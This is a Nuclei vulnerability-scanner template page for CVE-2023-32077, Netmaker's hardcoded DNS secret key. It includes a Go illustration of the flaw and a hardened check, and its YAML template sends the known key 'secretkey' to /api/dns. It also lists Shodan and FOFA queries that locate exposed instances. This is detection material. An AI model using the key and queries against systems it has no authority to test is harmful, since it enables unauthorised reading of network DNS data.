Netmaker - Hardcoded DNS Secret Key
ID: CVE-2023-32077
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2023,info-key,netmaker,exposure,gravitl
Description
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, Netmaker used a hardcoded DNS secret key, allowing unauthenticated users to interact with DNS API endpoints.
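The class of flaw this template detects (CWE-798/CWE-321), as an added Go illustration that is not Netmaker's code: a check against a compiled-in key beside one keyed per deployment. The function names, the 32-character minimum and the sample key are assumptions; the header shape follows the template's `Authorization: "x secretkey"` request.

```go
package main

import (
	"crypto/subtle"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

const hardcodedKey = "secretkey" // constructed stand-in for a key compiled into every build

// token returns the second field of a "<scheme> <token>" Authorization header.
func token(r *http.Request) string {
	f := strings.Fields(r.Header.Get("Authorization"))
	if len(f) != 2 {
		return ""
	}
	return f[1]
}

// vulnerableAuth accepts the constant, so anyone who has read the source passes.
func vulnerableAuth(r *http.Request) bool { return token(r) == hardcodedKey }

// newKeyAuth checks against a per-deployment key (assumed to be generated at install
// time and loaded from a secret store) and rejects keys too short to be random secrets.
func newKeyAuth(key string) (func(*http.Request) bool, error) {
	if len(key) < 32 {
		return nil, errors.New("DNS key must be a random secret of at least 32 characters")
	}
	return func(r *http.Request) bool {
		return subtle.ConstantTimeCompare([]byte(token(r)), []byte(key)) == 1
	}, nil
}

// allowed builds GET /api/dns with the given Authorization header and runs check on it.
func allowed(check func(*http.Request) bool, authHeader string) bool {
	req := httptest.NewRequest(http.MethodGet, "/api/dns", nil)
	req.Header.Set("Authorization", authHeader)
	return check(req)
}

func main() {
	hardened, err := newKeyAuth("constructed-per-deployment-key-0123456789abcdef")
	if err != nil {
		panic(err)
	}
	fmt.Println(allowed(vulnerableAuth, "x secretkey"), allowed(hardened, "x secretkey"))
}
```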
YAML Source
id: CVE-2023-32077

info:
  name: Netmaker - Hardcoded DNS Secret Key
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32077
    cwe-id: CWE-798,CWE-321
    epss-score: 0.08146
    epss-percentile: 0.94315
    cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gravitl
    product: netmaker
    shodan-query:
      - html:"netmaker"
      - http.html:"netmaker"
    fofa-query: body="netmaker"
  tags: cve,cve2023,info-key,netmaker,exposure,gravitl

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/dns"

    headers:
      Authorization: "x secretkey"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
        condition: and
# digest: 4a0a00473045022100e81b5cfc6308226c52af2469278a766ac75a42b0b8788c7997ba26e62f82b26e02204878546b9b7611dba755ce638619629915c33ac6cdf044de7d330de5d4a0e89b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32077.yaml"